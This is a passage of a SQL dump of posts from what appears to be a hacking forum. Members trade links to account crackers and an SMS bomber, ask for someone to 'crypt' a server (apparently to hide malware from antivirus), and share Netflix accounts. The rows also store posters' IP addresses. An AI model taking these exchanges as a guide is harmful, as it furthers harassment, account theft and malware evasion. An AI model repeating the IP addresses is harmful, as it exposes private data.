'[align=center][img]http://cdn2.afterdawn.fi/screenshots/normal/5844.jpg[/img][/align]\r\n\r\n[b]Rar Password Unlocker v2.1[/b]\r\n\r\nAppnimi Rar Password Unlocker is useful software to recover the password of protected RAR files.It supports both brute force as well as dictionary based password recovery technique that can help you to recover not only easy but also complex passwords. Once password is uncovered it automatically extracts the RAR file contents to target location.\r\n\r\nIt can be used by anyone who has forgotten the password of their RAR files. Also it can be great tool for forensic engineers in recovering password of secret RAR files.\r\n\r\nIt presents simple and cool interface making it easy for every one.\r\n\r\nIt works on wide range of operating systems starting from Windows 98 to latest, Windows 7.\r\n\r\n[b]Features[/b]\r\n\r\nHere are the highlights of the features\r\nEasy to use with its elegant GUI interface.\r\nRecover password of any length & complexity.\r\nBrute-Force method to recover password with prefix & suffix characters.\r\nSupport for dictionary based password recovery method.\r\nCustomize various parameters for effective password recovery.\r\nSupport Windows 98, ME, NT, 2000, XP, 2003, Vista & Windows 7\r\n\r\n\r\n\r\n[b]Using RarPasswordUnlocker[/b]\r\n\r\nRarPasswordUnlocker is easy to use with its simple GUI interface even for beginners.\r\n\r\n[b]Here are the brief usage details,[/b]\r\nDownload the RarPasswordUnlocker and run the installer.\r\nAfter installation, run \"Appnimi RAR Password Unlocker\" using one of the shortcuts on desktop or in the startup menu.\r\nEnter the path to password protected RAR file\r\nEnter the minimum and maximum length of the password\r\nNow click on Start button to start the password recovery process.\r\nDuring the operation, it will show number of attempts and the last attempted password\r\nOn successful recovery, Message will be shown with the recovered password.\r\n\r\n[b]Download:[/b]\r\n\r\n[code]\r\nhttp://uploaded.net/file/kqx6kd4m/PasswordUnlocker2.1.zip\r\n[/code]', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'c67204ee3b0af7a81c4eac20a0fcf532', '0', '0'); INSERT INTO mybb_posts VALUES('1773', '274', '1274', '42', 'RE: Another death in the family for Sylvester Stallone', '0', '5', 'Timmy', '1347328804', 'He looked so old in the movie. \n\nOT: RIP', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '9d470d49846791586fbb83029fbeab10', '0', '0'); INSERT INTO mybb_posts VALUES('1774', '333', '1565', '42', 'RE: Six Degrees Made For Adult Students', '0', '5', 'Timmy', '1347328849', 'Computing Computing Computing\n\nAll the highest demanded jobs involve computing then why hate the internet so much?', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'f6acd132ab0a601a19c4af16a50b94d9', '0', '0'); INSERT INTO mybb_posts VALUES('1775', '387', '0', '24', 'Good add ons on your computer.. Best upgrades on old computers', '0', '5', 'Timmy', '1347328926', '[b]System memory, hard drives and video cards[/b]\r\nWhile they might not be as sexy as a sleek new monitor or designer laptop skins, adding more memory — be it RAM or hard drive space — can really help boost performance of an older computer. And you don\'t need a degree in computer engineering to add both kinds of memory to a laptop or desktop.\r\nThe former helps speed up tasks -- resulting in less latency when launching and running programs -- plus it helps with multitasking, too. But you\'ll need to know what kind of system memory your machine takes (probably DDR3) and whether you\'re buying for a laptop or desktop (laptop RAM is smaller). RAM can often be snapped into its slot on the motherboard without requiring any tools; if you don\'t want to do it yourself, take it to your local electronics retailer and have them do it for you.\r\n\r\n[b]Mice, keyboards and webcams[/b]\r\nIf your mouse is still tethered to your computer, it\'s time to cut the cord with a wireless mouse — which you can pick up for as low as $5 these days (yes, for real). But because they\'re battery powered, consider picking up rechargeable batteries as it\'ll be easier on your wallet (over time) and the environment, too.\r\n\r\n[b]Speakers, monitors and USB hubs[/b]\r\nWhether you\'re into music, video games or movies, treat yourself — more specifically, your ears — to a great-sounding computer speaker set-up.\r\nAdd some boom to your room with the Logitech Z523 ($99.99), a 2.1-channel speaker system (including a 6.5-inch subwoofer) that delivers 40 watts of total power. While you can use your computer to adjust volume, convenient on-speaker controls include power, volume and amount of bass, plus there\'s extra jacks for a portable devices and headphones.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '902f0315c35d7c3fbabca935a0745edf', '0', '0'); INSERT INTO mybb_posts VALUES('1776', '373', '1734', '16', 'RE: Cadburys (SE)', '0', '5', 'Timmy', '1347328971', 'Thanks man I love cadbury chocolates', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '8f27c3d765bbb623907cff6368ea8f0c', '0', '0'); INSERT INTO mybb_posts VALUES('1777', '326', '1641', '16', 'RE: [TUT] Free Restaurant Gift Cards.', '0', '5', 'Timmy', '1347329034', '[quote=\'??????Z\' pid=\'1641\' dateline=\'1346964231\']\r\nattempted McDonald\'s and Nandos. will update if it works out :)\r\n[/quote]\r\n\r\nAmerica has Nandos? Also what restaurants can it work with?', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'a7238d18920522faa81e264bb4a7b46a', '0', '0'); INSERT INTO mybb_posts VALUES('1778', '350', '1649', '18', 'RE: WESTi\'s Email Cracker (Crack Any E-Mail - Hotmail, Yahoo, Gmail)', '0', '5', 'Timmy', '1347329098', 'This is awesome. Thanks by the way multi upload has removed their site.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '6d63ad8f182c311a7a06ce2866722afe', '0', '0'); INSERT INTO mybb_posts VALUES('1780', '298', '1383', '9', 'RE: ???[EASY] LH\'s #1 WAY TO EARN MONEY GUARANTEED [EASY]???', '0', '7', 'Romdu62', '1347329518', 'I would like this when the user comes online.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '629158203463af32cd6c6e6b5877496f', '0', '0'); INSERT INTO mybb_posts VALUES('1781', '388', '0', '52', 'Request for the coders group', '0', '7', 'Romdu62', '1347329794', 'Can someone from the coders group please make me a SMS Bomber from the thread below?\r\n\r\nhttp://l33thacking.net/thread-216.html\r\n\r\nThanks a lot', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', 'be3395f5b69554c3b806e1845d9270f3', '0', '0'); INSERT INTO mybb_posts VALUES('1782', '353', '1654', '13', 'RE: [Complete Guide]*How to crack All Sites Hosting With Apex!*[Complete Guide]', '0', '7', 'Romdu62', '1347329860', 'Fucking awesome. This tutorial is OD.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '796c433b871d8eb7d5d6493f172a0b2a', '0', '0'); INSERT INTO mybb_posts VALUES('1783', '385', '1769', '19', 'RE: Discussion', '0', '82', 'iTzIpod', '1347332520', '[quote=\'p420\' pid=\'1769\' dateline=\'1347313251\']\r\nDon\'t, why do you want to leave LH?\r\n\r\nYou have respect, you have the most awards, you run a official group(free), you are a Mod. You would not just lose all this but LH would lose a lot of activity as well.\r\n[/quote]\r\n\r\nYou\'re right about everything. But as for now, there are currently no more awards due to an outdated plugin. \r\n\r\nAnd I just have that feeling that I want to leave and I don\'t want to leave.\r\nKinda hard to explain. \r\n\r\nAnd the reason why was because..\r\n\r\nIt\'s nothing. Just something personal me and t3h jok3r about.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b4db3e50af366a830fc6f5311979e761', '0', '0'); INSERT INTO mybb_posts VALUES('1784', '385', '1768', '19', 'RE: Discussion', '0', '2', 'Apathy', '1347332584', 'Why would you Leave?', '173.206.178.83', '-1378962861', '0', '0', '0', '0', '1', 'b6153b3d8e99954c2bb617cb4a5dc582', '0', '0'); INSERT INTO mybb_posts VALUES('1785', '377', '1739', '54', 'RE: Netflix accounts', '0', '82', 'iTzIpod', '1347332586', 'I don\'t know what the difference between normal and premium. But thanks. Although I don\'t need them since I have my own accounts.\n\nThanks for the contribution to the forum.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '14c3f9b9f8668dde8104590149c4ade5', '0', '0'); INSERT INTO mybb_posts VALUES('1786', '361', '1702', '54', 'RE: Xbox live Code (1 Month)', '0', '82', 'iTzIpod', '1347332631', 'Very nice contribution. I don\'t know if it works or not. \nSince I do not have a Xbox 360.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '358334b6f10c006d1ee952a39c69cf2e', '0', '0'); INSERT INTO mybb_posts VALUES('1787', '378', '1742', '7', 'RE: How is school for you?', '0', '2', 'Apathy', '1347332652', 'Good but I hate homework.', '173.206.178.83', '-1378962861', '0', '0', '0', '0', '1', '1e65b52ea5e2b3519ce47cd9ef6b5f0d', '0', '0'); INSERT INTO mybb_posts VALUES('1788', '348', '1647', '30', 'RE: Brazzers Cracker', '0', '2', 'Apathy', '1347332768', 'I know where you got this. Nice share anyway.', '173.206.178.83', '-1378962861', '0', '0', '0', '0', '1', '8ed22f9c6356abb037395611f095347d', '0', '0'); INSERT INTO mybb_posts VALUES('1789', '385', '1784', '19', 'RE: Discussion', '0', '82', 'iTzIpod', '1347332933', '[quote=\'Apathy\' pid=\'1784\' dateline=\'1347332584\']\r\nWhy would you Leave?\r\n[/quote]\r\n\r\n[quote=\'iTzIpod\' pid=\'1783\' dateline=\'1347332520\']\r\nYou\'re right about everything. But as for now, there are currently no more awards due to an outdated plugin. \r\n\r\nAnd I just have that feeling that I want to leave and I don\'t want to leave.\r\nKinda hard to explain. \r\n\r\n[b]And the reason why was because..\r\n\r\nIt\'s nothing. Just something personal me and t3h jok3r about.[/b]\r\n[/quote]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9e0f59cbcdbefa2ac3de261763228274', '0', '0'); INSERT INTO mybb_posts VALUES('1790', '383', '1765', '29', 'RE: Paypal Withdrawy to cash or debit card [TUT DL]', '0', '82', 'iTzIpod', '1347333308', '[quote=\'??????Z\' pid=\'1765\' dateline=\'1347258711\']\r\nokay so with these methods you can withdraw your paypal cash either to cash or debit card, the cash one is very useful if you don\'t want to give any of your personal information to paypal. These tutorials was given to my by a friend so credit doesn\'t belong to me, but if this helped you then [b]please +Rep me.[/b] thanks\r\n\r\nWithdraw to debit card: http://www.mediafire.com/?z44xmusno4zj12h\r\n\r\nWithdraw to cash: http://www.mediafire.com/?c8i97f2oa8jbx4b\r\n[/quote]\r\n\r\nI don\'t think you should beg for rep. Or anything similar like that. It just seems LQ and all. \r\nAlso, I have added you to Unique.\r\n\r\nOT: I would try this method.. Just that I don\'t got a debit card.\r\nAlso, thanks for the contribution to LH. Hopefully someone will find it useful! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '189af827dbf19b33a3275760a8810bea', '0', '0'); INSERT INTO mybb_posts VALUES('1791', '383', '1765', '29', 'RE: Paypal Withdrawy to cash or debit card [TUT DL]', '0', '112', '??????Z', '1347352489', 'whos begging for rep? and where is the rule that a post has to be HQ to get rep, i say if i help someone then give me rep. surely if this helps someone then i deserve rep. no?', '92.22.255.215', '1545011159', '0', '0', '0', '0', '1', '941d571d3bd874a156edf795544a6d43', '0', '0'); INSERT INTO mybb_posts VALUES('1792', '388', '1781', '52', 'RE: Request for the coders group', '0', '67', 'HoverCatz', '1347359056', 'I can do that :)\n\nEDIT:\nHEy im done. Test it for me, i cant send emails via a 3rd-party from my school.\nhttp://www.sendspace.com/file/egkyl7', '193.161.89.203', '-1046390325', '1', '0', '67', '1347362315', '1', 'c63e1f81121c7ad24074f17f3ccc0cc1', '0', '1347362315'); INSERT INTO mybb_posts VALUES('1793', '289', '1354', '15', 'RE: UploadNSell Exploit Program', '0', '183', 'toxicsn0w', '1347362726', 'Why does chrome mark this as Malicious?', '69.119.94.188', '1165450940', '0', '0', '0', '0', '1', '09bf14b308cda3e4145bd0cb097b4bd6', '0', '0'); INSERT INTO mybb_posts VALUES('1794', '389', '0', '49', '[Suggestion] GFX Request Section', '0', '82', 'iTzIpod', '1347362908', 'Hey t3h jok3r, I just suggest that you should add a GFX Request Section. In this section, you can request GFX.\r\n\r\nGFX like \r\n\r\nSignatures/Tags\r\nAvatars\r\nWallpapers\r\nEtc.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e0425c47af737ced63f958f9ff6a87ed', '0', '0'); INSERT INTO mybb_posts VALUES('1795', '383', '1791', '29', 'RE: Paypal Withdrawy to cash or debit card [TUT DL]', '0', '82', 'iTzIpod', '1347363411', '[quote=\'??????Z\' pid=\'1791\' dateline=\'1347352489\']\r\nwhos begging for rep? and where is the rule that a post has to be HQ to get rep, i say if i help someone then give me rep. surely if this helps someone then i deserve rep. no?\r\n[/quote]\r\n\r\nWell it was just a suggestion. ;/ \r\n\r\nSome people will rep you. Some people will post a thank you.\r\n\r\nIt\'s like forcing someone to rep you. \r\nThey will rep you if they want too.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '45ff13219a3106ac2a9aec2114986663', '0', '0'); INSERT INTO mybb_posts VALUES('1796', '390', '0', '35', 'Which Photoshop version do you use?', '0', '82', 'iTzIpod', '1347365768', 'Just a simple question. \r\nI use Photoshop CS4 and Photoshop CS6.\r\nHow about you?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '453020ea2494bf15964dc08f7634bd50', '0', '0'); INSERT INTO mybb_posts VALUES('1797', '385', '1768', '19', 'RE: Discussion', '0', '67', 'HoverCatz', '1347367004', 'I dont want you to leave, so please dont :(', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', 'aacbdc435cfb70e37574e9c10db82687', '0', '0'); INSERT INTO mybb_posts VALUES('1799', '389', '1794', '49', 'RE: [Suggestion] GFX Request Section', '0', '61', 'NXK', '1347375550', 'Seems like a Good Idea. I approve of this.', '38.104.158.106', '644390506', '1', '0', '0', '0', '1', '5940180ef95f193b5fbffa03abeb42ea', '0', '0'); INSERT INTO mybb_posts VALUES('1800', '368', '1714', '47', 'RE: 5 free @l33thacking.net forwarders', '0', '61', 'NXK', '1347375623', 'Id like one, make me look alittle more legit. I have more than 3 threads that are HQ.', '38.104.158.106', '644390506', '1', '0', '61', '1347375650', '1', '41b0cf38ef17152d20fd9b42d64a6b35', '0', '1347375650'); INSERT INTO mybb_posts VALUES('1801', '390', '1796', '35', 'RE: Which Photoshop version do you use?', '0', '61', 'NXK', '1347375721', 'I use CS6. I\'m learning still but it works good.\r\n\r\nI used to use cs5 I don\'t really notice a difference in any of them TBH accept visual changes.', '38.104.158.106', '644390506', '1', '0', '0', '0', '1', '628f21396b7507e6dc688a20839a1be3', '0', '0'); INSERT INTO mybb_posts VALUES('1802', '378', '1742', '7', 'RE: How is school for you?', '0', '53', 'sirchamp', '1347376465', 'Lol\r\nYou have only one teacher?? I have for every subject a different teacher. Im going to a place called the gymnasium. A gymnasium is a school for the like 20% most clever kids of Switzerland. Yeahhh Switzerland..\r\nYou have to do a pretty hard test to join my school. So I go to school with lots of brainy kids -.-', '188.155.56.90', '-1130678182', '1', '0', '53', '1347376522', '1', '9bb912419314eab5ae8a90c7f698efac', '0', '1347376522'); INSERT INTO mybb_posts VALUES('1803', '363', '1706', '8', 'RE: Top 10 songs of September 2012', '0', '61', 'NXK', '1347377917', '[video=youtube]http://www.youtube.com/watch?v=uQZMaG1eO74[/video]\r\n\r\nWill be up there soon.', '99.253.65.17', '1677541649', '1', '0', '61', '1347377955', '1', '68c4745303a932431709e7c7a9483e30', '0', '1347377955'); INSERT INTO mybb_posts VALUES('1804', '289', '1793', '15', 'RE: UploadNSell Exploit Program', '0', '67', 'HoverCatz', '1347384655', '[quote=\'toxicsn0w\' pid=\'1793\' dateline=\'1347362726\']\r\nWhy does chrome mark this as Malicious?\r\n[/quote]\r\n\r\nI dont know. it does with all programs i make.', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', '1d847d8e6d50d9a747fa66553126bbd0', '0', '0'); INSERT INTO mybb_posts VALUES('1805', '389', '1794', '49', 'RE: [Suggestion] GFX Request Section', '0', '62', 'R?????zo?', '1347384850', 'seems a good idea, and I will be happy to make some signatures for members :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'db302b4f93114829e5ce900b25bb4162', '0', '0'); INSERT INTO mybb_posts VALUES('1806', '361', '1702', '54', 'RE: Xbox live Code (1 Month)', '0', '61', 'NXK', '1347390016', 'This code has already been used.\n\nThought I might have gotten lucky aha. Thanks anyways.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'bd8861f134b55b3c0ae4f881c2c02a7f', '0', '0'); INSERT INTO mybb_posts VALUES('1807', '368', '1714', '47', 'RE: 5 free @l33thacking.net forwarders', '0', '82', 'iTzIpod', '1347392358', 'Wait does it have to be in the time duration of the contest. Or can it be threads from before?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5d666a34c4d3c13eed91a3eef3e9eac8', '0', '0'); INSERT INTO mybb_posts VALUES('1808', '361', '1806', '54', 'RE: Xbox live Code (1 Month)', '0', '82', 'iTzIpod', '1347392449', '[quote=\'NXK\' pid=\'1806\' dateline=\'1347390016\']\r\nThis code has already been used.\r\n\r\nThought I might have gotten lucky aha. Thanks anyways.\r\n[/quote]\r\n\r\nCan you close the thread?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f99db4afc3502f101070d5797841fcb8', '0', '0'); INSERT INTO mybb_posts VALUES('1809', '378', '1802', '7', 'RE: How is school for you?', '0', '82', 'iTzIpod', '1347392591', '[quote=\'sirchamp\' pid=\'1802\' dateline=\'1347376465\']\r\nLol\r\nYou have only one teacher?? I have for every subject a different teacher. Im going to a place called the gymnasium. A gymnasium is a school for the like 20% most clever kids of Switzerland. Yeahhh Switzerland..\r\nYou have to do a pretty hard test to join my school. So I go to school with lots of brainy kids -.-\r\n[/quote]\r\n\r\nI still go to elementary school.\r\nGrade 8.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '946cacee9b0374cc6c25f25a5a9cec2d', '0', '0'); INSERT INTO mybb_posts VALUES('1810', '390', '1796', '35', 'RE: Which Photoshop version do you use?', '0', '2', 'Apathy', '1347394378', 'CS6 I went From 4 to 5 to 6 :)', '173.206.178.83', '-1378962861', '0', '0', '0', '0', '1', 'c7f156c3fecfd7b3876e217e357c6d45', '0', '0'); INSERT INTO mybb_posts VALUES('1811', '378', '1809', '7', 'RE: How is school for you?', '0', '2', 'Apathy', '1347394496', '[quote=\'iTzIpod\' pid=\'1809\' dateline=\'1347392591\']\r\n[quote=\'sirchamp\' pid=\'1802\' dateline=\'1347376465\']\r\nLol\r\nYou have only one teacher?? I have for every subject a different teacher. Im going to a place called the gymnasium. A gymnasium is a school for the like 20% most clever kids of Switzerland. Yeahhh Switzerland\r\nYou have to do a pretty hard test to join my school. So I go to school with lots of brainy kids \r\n\r\nI still go to elementary school.\r\nGrade 8.\r\n[/quote]\r\n\r\nWHAT? lol really?', '173.206.178.83', '-1378962861', '0', '0', '0', '0', '1', '96997d32e28400f002edc3b5d6ad30b1', '0', '0'); INSERT INTO mybb_posts VALUES('1812', '378', '1811', '7', 'RE: How is school for you?', '0', '61', 'NXK', '1347397614', 'Hes our little hacker bro :)', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'da6bb2f7d870f5461c7386c30daee28c', '0', '0'); INSERT INTO mybb_posts VALUES('1813', '378', '1811', '7', 'RE: How is school for you?', '0', '82', 'iTzIpod', '1347402816', '[quote=\'Apathy\' pid=\'1811\' dateline=\'1347394496\']\r\n[quote=\'iTzIpod\' pid=\'1809\' dateline=\'1347392591\']\r\n[quote=\'sirchamp\' pid=\'1802\' dateline=\'1347376465\']\r\nLol\r\nYou have only one teacher?? I have for every subject a different teacher. Im going to a place called the gymnasium. A gymnasium is a school for the like 20% most clever kids of Switzerland. Yeahhh Switzerland\r\nYou have to do a pretty hard test to join my school. So I go to school with lots of brainy kids \r\n\r\nI still go to elementary school.\r\nGrade 8.\r\n[/quote]\r\n\r\nWHAT? lol really?\r\n[/quote]\r\n\r\n\r\nThere a problem?\r\n\r\nLol @NXK <3 Made my day!~\r\n\r\n\r\nOT: Glad to see members posting. =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3a5b1b003ed29c403c6dd273b83d47b5', '0', '0'); INSERT INTO mybb_posts VALUES('1814', '289', '1354', '15', 'RE: UploadNSell Exploit Program', '0', '61', 'NXK', '1347411483', 'All this grabs is the same 1month.txt with the same code. It was a good Idea but it needs work.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '9f8ea54bc0655f4a14f2adad039e1bf3', '0', '0'); INSERT INTO mybb_posts VALUES('1815', '391', '0', '3', 'Demoted', '0', '20', 'JakeUS', '1347411541', 'I was a former Site Moderator here on L33tHacking. Due to school I was forced to take time away from the internet. I am still a regular Moderator, I am obviously online everyday moderating.\r\n\r\nJust letting everybody know.\r\n\r\n:cool:', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', 'c06448f2aa5908a29a29f86e0dde87c7', '0', '0'); INSERT INTO mybb_posts VALUES('1816', '392', '0', '9', 'PPD Niches', '0', '61', 'NXK', '1347411949', 'I\'m looking for a good Niche. Mine recently is failing me. Used to make 5-10$ A day. Now I make non :(\r\n\r\nIf anyone has a decent one they\'d like to share Please PM me.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '88539f571322e339ccc67a9054b44146', '0', '0'); INSERT INTO mybb_posts VALUES('1817', '388', '1781', '52', 'RE: Request for the coders group', '0', '7', 'Romdu62', '1347412498', 'Doesn\'t work :(\n\nCan you make me a SMS Bomber that works?', '173.245.64.29', '-1376436195', '0', '0', '0', '0', '1', 'b917d3129176bd7dc20f3a260307af37', '0', '0'); INSERT INTO mybb_posts VALUES('1818', '391', '1815', '3', 'RE: Demoted', '0', '7', 'Romdu62', '1347412554', 'Your title sounds wrong lol. I mean I thought you got demoted and you are complaining. \n\nThanks for letting us know.', '173.245.64.29', '-1376436195', '0', '0', '0', '0', '1', 'e245b8b989be18a0da7b52660f45a670', '0', '0'); INSERT INTO mybb_posts VALUES('1819', '390', '1810', '35', 'RE: Which Photoshop version do you use?', '0', '82', 'iTzIpod', '1347413261', '[quote=\'Apathy\' pid=\'1810\' dateline=\'1347394378\']\r\nCS6 I went From 4 to 5 to 6 :)\r\n[/quote]\r\n\r\nOh. I have never tried CS5.\r\n\r\nOnly CS3, CS4, and CS6.\r\n\r\nNever liked CS3 :3 I still got it on my computer though.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '97d2d3b1f49f079fc11e9417abca8b74', '0', '0'); INSERT INTO mybb_posts VALUES('1820', '391', '1815', '3', 'RE: Demoted', '0', '61', 'NXK', '1347413370', 'I\'m glad that I have taken over your position. I think Ill do a good job. But At the same time I feel kinda bad :(\n\nI hope I can do my job as well as you did. Thanks for the chance.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '40c45973c0fe92528c4c5d93816ee8f4', '0', '0'); INSERT INTO mybb_posts VALUES('1821', '391', '1815', '3', 'RE: Demoted', '0', '82', 'iTzIpod', '1347413498', 'Title should be \n\nJakeUS Demotion Explained\n\nOr something. \n\nOT: Oh. So that\'s why you were demoted. \nYeah I might be inactive and get demoted upon request because of the same reason.\nIf you checked out Unique\'s HQ, you would notice my thread \"Discussion\"..\n\nI\'m still thinking about it. Because it\'s a hard decision.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd0bb54e5f70ab5c47a378be7cd4ff895', '0', '0'); INSERT INTO mybb_posts VALUES('1822', '389', '1799', '49', 'RE: [Suggestion] GFX Request Section', '0', '82', 'iTzIpod', '1347413558', '[quote=\'NXK\' pid=\'1799\' dateline=\'1347375550\']\nSeems like a Good Idea. I approve of this.\n[/quote]\n\nAlright.\n\nStill open until t3h jok3r approves/denies.\n\nHopefully it is approved! :D', '24.212.197.164', '416597412', '1', '0', '82', '1347413591', '1', '37101e15b5ad7481f3e0fc4f93b05f07', '0', '1347413591'); INSERT INTO mybb_posts VALUES('1823', '317', '1759', '61', 'RE: Unique\'s Purpose', '0', '82', 'iTzIpod', '1347413923', '[quote=\'t3h jok3r\' pid=\'1759\' dateline=\'1347246213\']\r\n[quote=\'p420\' pid=\'1685\' dateline=\'1347076729\']\r\nQuick Question: Why are only the LH Mods leaders? Well now NXK is Staff but before he was Mod.\r\n[/quote]\r\n\r\nYou can request a group to. You don\'t have to be a Mod, Staff or Admin to request a official group.\r\n[/quote]\r\n\r\nI can\'t seem to make NXK a Leader?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3baa4e7bee65f6e8d2f11afe4266ff3e', '0', '0'); INSERT INTO mybb_posts VALUES('1824', '309', '1456', '61', 'RE: Quick Announcement', '0', '82', 'iTzIpod', '1347413977', 'Thanks for the announcement! :D \n\n\nStickied.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7ba05a934853064e3fddd4d57252c68c', '0', '0'); INSERT INTO mybb_posts VALUES('1825', '385', '1797', '19', 'RE: Discussion', '0', '82', 'iTzIpod', '1347414054', '[quote=\'HoverCatz\' pid=\'1797\' dateline=\'1347367004\']\r\nI dont want you to leave, so please dont :(\r\n[/quote]\r\n\r\n:p Can you explain with more detail?\r\nI just want to see the positive and negative posts about this. Remember it is a discussion.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8291516a328657768b614786a90e6ca3', '0', '0'); INSERT INTO mybb_posts VALUES('1826', '360', '1757', '58', 'RE: What are the official groups?', '0', '82', 'iTzIpod', '1347414149', '[quote=\'spacefish36\' pid=\'1757\' dateline=\'1347237703\']\r\nDamn only two groups? I might suggest a group to LH\r\n[/quote]\r\n\r\nYou can suggest one [url=http://l33thacking.net/thread-212.html] here[/url]\r\nAnd also, if you need a Userbar, please tell me. I can try and design it for you. Or ask Reloadzor', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8525efe4aff842f636c52d8c5fb6c653', '0', '0'); INSERT INTO mybb_posts VALUES('1827', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1347414202', 'Note: The Coders image is broken also, you forgot to edit my group \"Unique\" in. =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd25373cdf3cf82341f7bcfd5201b4bc2', '0', '0'); INSERT INTO mybb_posts VALUES('1828', '389', '1794', '49', 'RE: [Suggestion] GFX Request Section', '0', '1', 't3h jok3r', '1347418078', 'If NXK approved it then it\'s a 80% yes from me and don\'t always ask me in threads, if you want to ask me something then PM me. If you want to suggest something then you should ask the whole community if they agree or not.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b659f50539292c80b75a3734251e72d9', '0', '0'); INSERT INTO mybb_posts VALUES('1829', '388', '1781', '52', 'RE: Request for the coders group', '0', '67', 'HoverCatz', '1347430638', 'Can you explain how it doesnt work?', '193.161.89.202', '-1046390326', '1', '0', '0', '0', '1', '02de742185592f1e4c1f1740cc342a71', '0', '0'); INSERT INTO mybb_posts VALUES('1830', '326', '1777', '16', 'RE: [TUT] Free Restaurant Gift Cards.', '0', '112', '??????Z', '1347434323', '[quote=\'Timmy\' pid=\'1777\' dateline=\'1347329034\']\r\n[quote=\'??????Z\' pid=\'1641\' dateline=\'1346964231\']\r\nattempted McDonald\'s and Nandos. will update if it works out :)\r\n[/quote]\r\n\r\nAmerica has Nandos? Also what restaurants can it work with?\r\n[/quote]\r\n\r\nI\'m in England so not sure if America has nandos', '92.23.147.171', '1545049003', '1', '0', '0', '0', '1', '82dd75a0ef4618d69949eeac2ed1af9e', '0', '0'); INSERT INTO mybb_posts VALUES('1831', '289', '1354', '15', 'RE: UploadNSell Exploit Program', '0', '67', 'HoverCatz', '1347435328', 'Oh. Doesnt it get more than one? I will fix that when i get back home, school atm. Im home in 7 hours from this post.', '193.161.89.203', '-1046390325', '1', '0', '0', '0', '1', '66168043d3d7a034c8b9a7ec71fa2dfd', '0', '0'); INSERT INTO mybb_posts VALUES('1832', '389', '1828', '49', 'RE: [Suggestion] GFX Request Section', '0', '82', 'iTzIpod', '1347451017', '[quote=\'t3h jok3r\' pid=\'1828\' dateline=\'1347418078\']\r\nIf NXK approved it then it\'s a 80% yes from me and don\'t always ask me in threads, if you want to ask me something then PM me. If you want to suggest something then you should ask the whole community if they agree or not.\r\n[/quote]\r\n\r\nSo. What do you think?\r\n\r\n\r\nAccept/Deny?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b9794f04317e82477bf98a411e8b804e', '0', '0'); INSERT INTO mybb_posts VALUES('1833', '391', '1815', '3', 'RE: Demoted', '0', '2', 'Apathy', '1347451233', 'Hmm alright thanks for letting us know.', '173.206.178.83', '-1378962861', '0', '0', '0', '0', '1', 'af219702f2a2c37d11d3c6e15922b25a', '0', '0'); INSERT INTO mybb_posts VALUES('1834', '393', '0', '55', 'someone can crypt my server?', '0', '62', 'R?????zo?', '1347453303', 'Could someone crypt my server?\r\nI will PM you the direct link.\r\nthanks in advance if you could do this <3', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'af07f75cd9ec89717b67cd4221d8ce37', '0', '0'); INSERT INTO mybb_posts VALUES('1835', '361', '1702', '54', 'RE: Xbox live Code (1 Month)', '0', '61', 'NXK', '1347459005', '[mod]This Thread has been Closed due to code already being Used[/mod]', '38.104.158.106', '644390506', '0', '0', '1', '1347482706', '1', '517c6499c0e1b8528ea2f8b50f1dab95', '0', '1347482706'); INSERT INTO mybb_posts VALUES('1836', '378', '1742', '7', 'RE: How is school for you?', '0', '53', 'sirchamp', '1347464106', 'Funnily I also should be in Grade 8 but I skipped 2 classes So I go to secondary school.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '5a3a89f759ee8612c5080a214382f8ed', '0', '0'); INSERT INTO mybb_posts VALUES('1837', '389', '1794', '49', 'RE: [Suggestion] GFX Request Section', '0', '1', 't3h jok3r', '1347465866', 'You made a very useful suggestion. I actually wanted to add this when we LH gotten more members that was when LH hardly had 10 members. Now thanks to everyone LH has 175 members atm so it\'s the right time to add such a section. Thanks for suggesting, this forum will be added soon.\n\n/closed', '72.231.24.165', '1223104677', '1', '0', '1', '1347465876', '1', '74f36c5c18a404422fefe61bf20c3129', '0', '1347465876'); INSERT INTO mybb_posts VALUES('1838', '268', '1189', '49', 'RE: [Suggestion] Forum News Section', '0', '1', 't3h jok3r', '1347465938', 'It\'s kinda of a useless section at the moment because we don\'t much new things and we 